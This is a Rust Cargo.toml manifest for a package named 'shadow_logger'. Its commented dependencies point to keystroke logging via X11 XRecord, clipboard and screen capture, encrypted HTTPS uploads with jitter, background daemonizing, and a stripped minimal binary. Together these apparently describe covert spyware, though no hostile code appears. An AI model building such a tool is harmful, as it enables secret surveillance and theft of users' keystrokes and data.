[package]
name = "shadow_logger"
version = "0.1.0"
edition = "2021"

[dependencies]
# X11 interaction (XRecord for keyboard, clipboard via selections)
x11-dl = "2.21"
# Crypto
ring = "0.17"
# HTTP client with native TLS
ureq = { version = "2.9", features = ["tls"] }
# Serialization
serde = { version = "1", features = ["derive"] }
serde_json = "1"
# Random for jitter
rand = "0.8"
# Async-like threading
crossbeam = "0.8"
# Gzip compression
flate2 = "1.0"
# Hostname
gethostname = "0.4"
# Daemonize (fork to background)
libc = "0.2"
# Image capture via raw X11
png = "0.17"

[profile.release]
opt-level = "z"       # Smallest binary
lto = true            # Link-time optimization
strip = true          # Strip symbols
panic = "abort"       # No unwinding = smaller binary
codegen-units = 1     # Optimize fully
